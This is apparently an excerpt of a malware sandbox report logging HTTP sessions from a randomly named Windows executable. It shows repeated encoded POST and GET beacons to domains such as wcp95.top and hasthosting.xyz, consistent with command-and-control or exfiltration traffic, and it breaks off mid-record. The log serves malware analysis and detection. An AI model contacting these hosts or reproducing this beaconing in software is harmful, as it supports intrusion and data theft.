Nov 11, 2024 08:34:24.187303066 CET	831	OUT	POST /y0sc/ HTTP/1.1 Host: www.loginov.enterprises Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.loginov.enterprises Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 223 Referer: http://www.loginov.enterprises/y0sc/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 67 4c 31 4b 2f 7a 61 61 2f 56 48 7a 69 49 76 6a 4b 4b 70 64 4b 4d 43 4f 61 57 79 2f 4e 75 49 73 34 49 79 73 56 37 59 66 76 4f 46 54 37 44 6a 47 70 53 39 4f 55 65 65 59 37 4c 30 66 5a 56 79 72 31 62 33 51 45 36 52 64 35 58 2b 79 4a 4b 43 59 71 67 52 36 52 55 4d 67 57 78 74 46 76 51 47 65 69 66 4e 42 77 76 79 76 59 5a 6b 77 54 55 42 71 70 63 42 6c 52 58 34 37 54 52 75 74 51 7a 70 53 6a 6c 70 76 6e 73 76 34 41 44 71 43 32 2b 63 2f 53 75 65 77 66 5a 49 50 49 6b 67 43 33 68 67 66 55 76 77 71 57 76 66 46 61 58 73 30 37 64 72 35 39 58 5a 50 6d 6e 75 6d 63 67 45 4a 55 73 47 66 57 56 64 78 56 67 34 66 6b 42 38 46 57 46 71 75 62 66 79 5a 68 63 41 3d Data Ascii: Ir8HUj=gL1K/zaa/VHziIvjKKpdKMCOaWy/NuIs4IysV7YfvOFT7DjGpS9OUeeY7L0fZVyr1b3QE6Rd5X+yJKCYqgR6RUMgWxtFvQGeifNBwvyvYZkwTUBqpcBlRX47TRutQzpSjlpvnsv4ADqC2+c/SuewfZIPIkgC3hgfUvwqWvfFaXs07dr59XZPmnumcgEJUsGfWVdxVg4fkB8FWFqubfyZhcA=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	50053	3.33.130.190	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:34:26.729247093 CET	10913	OUT	POST /y0sc/ HTTP/1.1 Host: www.loginov.enterprises Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.loginov.enterprises Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10303 Referer: http://www.loginov.enterprises/y0sc/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 67 4c 31 4b 2f 7a 61 61 2f 56 48 7a 69 49 76 6a 4b 4b 70 64 4b 4d 43 4f 61 57 79 2f 4e 75 49 73 34 49 79 73 56 37 59 66 76 4f 64 54 36 78 62 47 34 46 52 4f 54 65 65 59 79 72 30 65 5a 56 79 6d 31 66 69 62 45 36 56 6e 35 55 47 79 4a 70 61 59 36 42 52 36 66 6b 4d 67 55 78 74 45 72 51 47 48 69 66 64 4e 77 76 43 76 59 5a 6b 77 54 57 4a 71 35 39 42 6c 64 33 34 38 61 78 75 62 55 7a 6f 48 6a 6c 78 5a 6e 73 62 53 41 79 4b 43 32 65 73 2f 54 64 6d 77 41 4a 49 4e 4a 6b 68 48 33 68 74 42 55 76 73 4d 57 75 62 76 61 56 77 30 34 4a 2b 74 70 47 6c 6f 34 46 4b 69 4a 69 63 43 51 74 69 71 66 55 68 4c 63 53 4a 45 32 42 30 53 4c 56 33 61 4c 64 32 6c 39 6f 75 45 48 4b 6b 4e 64 45 4b 64 55 43 59 6e 61 46 49 6b 4a 57 2f 2b 64 65 54 59 34 63 74 72 79 58 48 45 37 51 61 58 30 6b 67 47 56 66 4c 6d 69 42 4f 5a 31 62 33 34 33 4e 47 33 6f 46 65 52 53 66 75 46 6f 33 64 56 57 71 73 68 35 44 6d 55 68 66 34 39 33 54 45 5a 69 45 70 71 79 63 49 2b 33 65 78 6a 6f 44 49 6f 42 42 64 59 64 6a 53 73 68 53 43 41 4b 69 75 [TRUNCATED] Data Ascii: Ir8HUj=gL1K/zaa/VHziIvjKKpdKMCOaWy/NuIs4IysV7YfvOdT6xbG4FROTeeYyr0eZVym1fibE6Vn5UGyJpaY6BR6fkMgUxtErQGHifdNwvCvYZkwTWJq59Bld348axubUzoHjlxZnsbSAyKC2es/TdmwAJINJkhH3htBUvsMWubvaVw04J+tpGlo4FKiJicCQtiqfUhLcSJE2B0SLV3aLd2l9ouEHKkNdEKdUCYnaFIkJW/+deTY4ctryXHE7QaX0kgGVfLmiBOZ1b343NG3oFeRSfuFo3dVWqsh5DmUhf493TEZiEpqycI+3exjoDIoBBdYdjSshSCAKiuhNg3afKgYZE2WILmOSuM+7wLERrPLDGXLYyvCECT8XVUDQSs3ZUZU4Gsj2JiADD2z30BF7NX4d97Py64FiDTOo+DF6KPnr+cHnxRXI3//tTBead+DoTWS8pMtnjXOfhPGLoEqVGywWQRS7117y8ogS0ESOIiWon6hhkVfm6OU01Kzp1aUgYYMTAvSPLtf/uCz7HOQDSDTvflhK0pfVRkI2V5scGGn6nA1riPFt9TKln/kDRgCt81/2Kb4Nx21BZBBqrzw5EJsXeNFnpv+TU9gCUWShenWocKXBPxntnGKyLqqtWZdK00s7YlhcUShx42VImU8Yw1sw4mn7QYIYrYAcmV0G4Zhb9QRMW0s7Pv+Z10fgvDZIBD75Xw4btdii/9ZsH+2xG3HW7a0pP6qURqFrTJPeXk9BvCL7PHolpQcCqz76iH25Ca6l/EwhWPJtBXE9bDT0jRAC4z6CLMQCGS6KIHS6UE6Q6uS2quV44L0Ak+/7koVKK7y65XgW40yhRjZRZcVSGuG+jshtL0Jlxn6H2LkgzmyJBjG5CSwcGyZPnK8HVIT1BbZujm+DsRo6TGVKNzhln4IvGFBNxfiiJMeDdZ22mD39oGfaY401F7mV0kG6aYl6lmU1rV2soU1xUNDtopgBxqOGQZiw16053z/G3zJQqwySurST [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	50054	3.33.130.190	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:34:29.275306940 CET	540	OUT	GET /y0sc/?Ir8HUj=tJdq8Dqw4hWr1P6qEs9XA9ulKGeCKOZ69MCgVLcAx6ZVjDjmpjdFTuG7zOk3Xzu/3Z3aFvoU5EatdrO56B9xfE0dTwpHmj+n2Md29oHJdKs4Wl1g5NQAF3s=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1 Host: www.loginov.enterprises Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 11, 2024 08:34:29.703192949 CET	405	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 11 Nov 2024 07:34:29 GMT Content-Type: text/html Content-Length: 265 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 72 38 48 55 6a 3d 74 4a 64 71 38 44 71 77 34 68 57 72 31 50 36 71 45 73 39 58 41 39 75 6c 4b 47 65 43 4b 4f 5a 36 39 4d 43 67 56 4c 63 41 78 36 5a 56 6a 44 6a 6d 70 6a 64 46 54 75 47 37 7a 4f 6b 33 58 7a 75 2f 33 5a 33 61 46 76 6f 55 35 45 61 74 64 72 4f 35 36 42 39 78 66 45 30 64 54 77 70 48 6d 6a 2b 6e 32 4d 64 32 39 6f 48 4a 64 4b 73 34 57 6c 31 67 35 4e 51 41 46 33 73 3d 26 67 52 55 30 65 3d 6a 58 46 54 30 34 46 68 76 42 5a 38 6a 30 42 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ir8HUj=tJdq8Dqw4hWr1P6qEs9XA9ulKGeCKOZ69MCgVLcAx6ZVjDjmpjdFTuG7zOk3Xzu/3Z3aFvoU5EatdrO56B9xfE0dTwpHmj+n2Md29oHJdKs4Wl1g5NQAF3s=&gRU0e=jXFT04FhvBZ8j0BP"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	50055	154.23.184.95	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:34:35.240823984 CET	781	OUT	POST /1bs4/ HTTP/1.1 Host: www.wcp95.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.wcp95.top Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 203 Referer: http://www.wcp95.top/1bs4/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 41 46 4e 72 38 44 59 4d 72 6c 76 6b 4b 31 4f 2f 66 71 5a 49 6f 70 57 4a 35 58 37 42 75 2b 34 6e 34 4d 66 4f 41 77 36 36 41 6a 6c 7a 50 74 4b 42 69 32 58 34 32 69 44 6e 6c 34 33 4a 64 73 68 2b 42 56 62 32 42 68 59 49 61 6e 67 48 2b 46 6e 37 54 52 77 66 50 6a 45 70 51 4c 63 37 77 59 4e 36 6b 33 32 79 37 64 4a 4b 32 47 6b 33 30 36 78 2f 6d 30 72 31 71 66 45 4b 64 38 61 62 45 79 47 64 48 77 70 46 70 49 79 56 34 6d 4a 5a 53 61 33 79 45 67 72 2f 52 73 6d 62 71 2f 32 50 56 56 39 4d 79 77 61 4f 51 4d 30 76 64 4c 45 66 79 46 48 6a 72 70 61 52 72 53 63 49 36 6a 72 65 38 39 55 47 73 77 3d 3d Data Ascii: Ir8HUj=AFNr8DYMrlvkK1O/fqZIopWJ5X7Bu+4n4MfOAw66AjlzPtKBi2X42iDnl43Jdsh+BVb2BhYIangH+Fn7TRwfPjEpQLc7wYN6k32y7dJK2Gk306x/m0r1qfEKd8abEyGdHwpFpIyV4mJZSa3yEgr/Rsmbq/2PVV9MywaOQM0vdLEfyFHjrpaRrScI6jre89UGsw==
Nov 11, 2024 08:34:36.039155006 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 07:34:35 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a747c1-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	50056	154.23.184.95	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:34:37.793649912 CET	801	OUT	POST /1bs4/ HTTP/1.1 Host: www.wcp95.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.wcp95.top Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 223 Referer: http://www.wcp95.top/1bs4/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 41 46 4e 72 38 44 59 4d 72 6c 76 6b 49 57 57 2f 5a 4a 42 49 34 35 57 47 67 6e 37 42 35 75 34 6a 34 4d 54 4f 41 30 43 71 48 52 42 7a 57 49 75 42 6a 33 58 34 33 69 44 6e 78 6f 33 4d 44 63 68 68 42 56 48 45 42 6b 59 49 61 6e 30 48 2b 48 2f 37 50 32 6b 65 50 7a 45 72 62 72 63 6c 2f 34 4e 36 6b 33 32 79 37 64 64 6b 32 46 55 33 30 76 68 2f 70 78 66 32 30 76 45 4a 61 38 61 62 53 79 47 5a 48 77 6f 69 70 4e 71 2f 34 67 46 5a 53 59 2f 79 45 52 72 38 61 73 6d 6e 75 2f 33 46 61 45 63 53 72 44 4b 43 65 4d 38 7a 57 34 41 51 36 6a 4b 35 36 59 37 47 35 53 34 37 6e 6b 69 71 78 2b 70 50 33 34 6b 6e 71 41 49 79 55 48 73 56 55 69 43 73 38 50 75 47 4f 72 49 3d Data Ascii: Ir8HUj=AFNr8DYMrlvkIWW/ZJBI45WGgn7B5u4j4MTOA0CqHRBzWIuBj3X43iDnxo3MDchhBVHEBkYIan0H+H/7P2kePzErbrcl/4N6k32y7ddk2FU30vh/pxf20vEJa8abSyGZHwoipNq/4gFZSY/yERr8asmnu/3FaEcSrDKCeM8zW4AQ6jK56Y7G5S47nkiqx+pP34knqAIyUHsVUiCs8PuGOrI=
Nov 11, 2024 08:34:38.592226028 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 07:34:38 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a747c1-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	50057	154.23.184.95	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:34:40.344938040 CET	10883	OUT	POST /1bs4/ HTTP/1.1 Host: www.wcp95.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.wcp95.top Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10303 Referer: http://www.wcp95.top/1bs4/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 41 46 4e 72 38 44 59 4d 72 6c 76 6b 49 57 57 2f 5a 4a 42 49 34 35 57 47 67 6e 37 42 35 75 34 6a 34 4d 54 4f 41 30 43 71 48 52 4a 7a 57 65 79 42 69 51 72 34 30 69 44 6e 75 59 33 4e 44 63 68 6f 42 56 66 41 42 6b 63 32 61 6c 4d 48 73 79 6a 37 66 43 49 65 41 7a 45 72 55 4c 63 34 77 59 4d 79 6b 33 6d 32 37 64 4e 6b 32 46 55 33 30 75 52 2f 75 6b 72 32 32 76 45 4b 64 38 61 58 45 79 47 39 48 77 78 64 70 4e 6d 46 37 51 6c 5a 56 34 76 79 66 44 54 38 59 4d 6d 68 69 66 32 51 61 45 51 7a 72 46 76 78 65 4e 34 4a 57 2f 49 51 35 6e 37 63 6e 71 7a 50 74 55 6b 65 39 33 4f 66 36 2b 5a 35 7a 61 70 59 35 53 55 4a 58 30 67 4f 65 52 76 53 34 50 75 37 56 73 4a 6c 30 4c 71 44 6e 42 6b 67 4c 72 39 30 63 4f 31 6f 33 56 33 65 4c 2b 37 62 6e 72 6a 36 6b 75 51 57 34 31 4a 39 71 4c 38 70 57 50 6a 55 42 4e 36 4c 58 63 36 42 54 6f 63 37 75 75 4b 31 72 78 44 41 4d 32 45 4e 71 5a 46 42 53 52 37 65 38 4d 45 45 54 43 46 7a 63 41 71 57 2b 6e 6b 33 61 4d 41 73 38 37 47 45 42 37 34 67 51 72 52 37 36 41 52 36 49 78 35 [TRUNCATED] Data Ascii: Ir8HUj=AFNr8DYMrlvkIWW/ZJBI45WGgn7B5u4j4MTOA0CqHRJzWeyBiQr40iDnuY3NDchoBVfABkc2alMHsyj7fCIeAzErULc4wYMyk3m27dNk2FU30uR/ukr22vEKd8aXEyG9HwxdpNmF7QlZV4vyfDT8YMmhif2QaEQzrFvxeN4JW/IQ5n7cnqzPtUke93Of6+Z5zapY5SUJX0gOeRvS4Pu7VsJl0LqDnBkgLr90cO1o3V3eL+7bnrj6kuQW41J9qL8pWPjUBN6LXc6BToc7uuK1rxDAM2ENqZFBSR7e8MEETCFzcAqW+nk3aMAs87GEB74gQrR76AR6Ix51Ihmp/B16EbmmrZ79es8z4JJZ1W4t04r3LVK0OU5fmmCP00s9o1CEXNutUwG9xc24B/qBX3K8COYf/T0C1APm2zwV7gG6L90vZtoqigMeixMFafNizLieFxmYeSBClpN4m0J5Bx6yGKWyN7DX/Rm7O2bWEmqE9wNycmCVtN7X50+H3GMjRMyHxikbA6tPw5ProtjBfZhCrfobTuzGUGRphc2YkCSunG+N1ghmsMfytYdCbGEOOPauEpsuOMFguCLqsjzGYM5WkzlGn0jQeW/v7FUv/vdVyUfER0CVsRQRRFplt3xphwwfmwS/eNIfP/qZjtxR+JoE7uDFDY+GBkAO5SB8Y+1mvLsQXEwft9SyC1dzPI8XRFiYxdhU/ykK+ORi71QoApRRDnubrnz/HGoM35spnQ1H3Av/evvi/TOXGiQcKI4pqxijGhPLC6Eai5YhovgBJLOcgryTWe2SMauKa3V7bTlFL+ekyRDvjTreHxR0Sv0m/q3143y+Z6OgerAxv9bI3SXJ7GxL2dWjBbBXh1nus8+sRLG44bTou/cOHlJQcJixOnJ3v0OIFT3S0ksXzxdxmll9RDWY2vpukhyB5zCvBWL9kOq0jePOw8IsqEKzw9sFvO2X4FXUjps/a3ujPqMEbwQmQt6KocGL2N9oftTH9pumBJL+B [TRUNCATED]
Nov 11, 2024 08:34:41.153666019 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 07:34:41 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a747c1-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	50058	154.23.184.95	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:34:42.883171082 CET	530	OUT	GET /1bs4/?Ir8HUj=NHlL/20Wj3mxTDCCV+M5id+XoFfJt54Wk+fSFhy0eU4XSufIixCpuDbgh6jDD4pzJGK3HRNTU3Jm+E3fIwMaFSslRZAP0ZQrwEek3MA5lFQUr9BJzjrl1NA=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1 Host: www.wcp95.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 11, 2024 08:34:43.685138941 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 07:34:43 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a747c1-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	50059	185.27.134.144	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:34:48.963349104 CET	799	OUT	POST /04fb/ HTTP/1.1 Host: www.hasthosting.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.hasthosting.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 203 Referer: http://www.hasthosting.xyz/04fb/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 4a 42 36 4b 36 6f 79 49 64 4c 69 35 2b 4a 77 59 44 76 6d 79 7a 73 5a 67 6b 62 75 49 77 76 71 41 4f 58 48 54 30 43 6b 43 4a 6f 55 58 73 71 54 4f 2f 31 65 4f 30 53 69 72 75 72 64 46 53 6b 79 62 4d 63 38 78 41 61 75 6b 74 74 6c 31 46 79 37 46 51 45 61 48 54 2b 4d 77 36 51 42 4e 74 43 59 35 65 36 39 45 72 67 76 6a 38 74 59 46 4d 6b 65 78 74 57 67 4e 68 42 41 78 77 70 79 38 4c 62 53 35 65 38 73 75 4d 7a 49 2b 52 62 50 63 55 6e 66 6c 45 30 2f 66 4c 39 49 53 6c 50 6d 70 68 72 6b 49 76 79 58 33 48 61 41 70 31 5a 70 30 76 67 50 4b 51 71 78 35 57 41 30 50 4a 57 59 78 65 47 4c 39 63 51 3d 3d Data Ascii: Ir8HUj=JB6K6oyIdLi5+JwYDvmyzsZgkbuIwvqAOXHT0CkCJoUXsqTO/1eO0SirurdFSkybMc8xAaukttl1Fy7FQEaHT+Mw6QBNtCY5e69Ergvj8tYFMkextWgNhBAxwpy8LbS5e8suMzI+RbPcUnflE0/fL9ISlPmphrkIvyX3HaAp1Zp0vgPKQqx5WA0PJWYxeGL9cQ==
Nov 11, 2024 08:34:49.514203072 CET	686	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 07:34:49 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Content-Encoding: br Data Raw: 31 62 63 0d 0a a1 10 1a 00 20 93 6e 39 ad b9 d4 c8 11 c5 03 1f 6a 3e f5 b7 6a f4 4d a0 62 03 e7 44 9d e8 54 23 1b 7c b3 e4 c4 01 4f b8 3c ea 66 07 3b e8 6d ae d9 b3 3f 41 ea c1 31 b7 46 20 5d 12 98 b6 d3 43 ad 56 00 3f a9 68 cf 30 c9 b4 ef e8 b4 83 a0 1d b0 1b 33 e5 db b9 94 7e 85 91 d3 45 0e e0 94 57 8f cf 8d f3 43 86 45 94 22 36 c2 46 90 2a e3 dd 81 c3 92 76 58 14 08 fd 43 dc f7 ff 53 24 ae fc 57 84 7e e1 5a 71 ea f1 19 3b 25 94 da 35 9a d6 f5 fd 7d 29 14 fd a5 bf a7 7f b1 da 2a 75 bc dd ea ef 43 1d be 16 cc 63 af 20 c4 41 f1 26 0c dc fb b6 37 21 8e 91 8f 55 24 8a d6 3d 86 e7 43 c8 61 0d 21 8a 2f 8e 12 68 10 89 62 d9 65 6f 48 e8 7f bd 3d ad 00 fa 0f 18 8a 3c 37 5a 3a 2e b5 10 89 cb 64 51 d9 22 cd 4b e9 4c 2e b9 c9 20 c2 c6 e6 b5 ac d2 2c b3 89 f7 be 2a 6c 2a 65 56 49 9e cb 24 af 72 93 c9 50 f1 01 b2 8f 79 99 ea 24 24 65 e6 d3 cc 4a 2e 1c cf 52 9b 0b c9 bd 28 ad cc c2 88 1b b7 b2 db 46 4f 00 53 0a be be f6 be eb 15 8c 91 86 08 76 fe f8 fc 81 3a 6f b7 df eb 3e b2 38 c1 1a 1b 84 62 d8 80 c8 fc 50 0d [TRUNCATED] Data Ascii: 1bc n9j>jMbDT#\|O<f;m?A1F ]CV?h03~EWCE"6FvXCS$W~Zq;%5})uCc A&7!U$=Ca!/hbeoH=<7Z:.dQ"KL. ,leVI$rPy$$eJ.R(FOSv:o>8bPyK$iuaw\1cxrDa% .p-~n"3J%-e(5`JF([J3qf0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	50060	185.27.134.144	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:34:51.509109974 CET	819	OUT	POST /04fb/ HTTP/1.1 Host: www.hasthosting.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.hasthosting.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 223 Referer: http://www.hasthosting.xyz/04fb/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 4a 42 36 4b 36 6f 79 49 64 4c 69 35 6b 6f 41 59 50 6f 53 79 6e 38 5a 6a 72 37 75 49 2f 50 72 4a 4f 58 4c 54 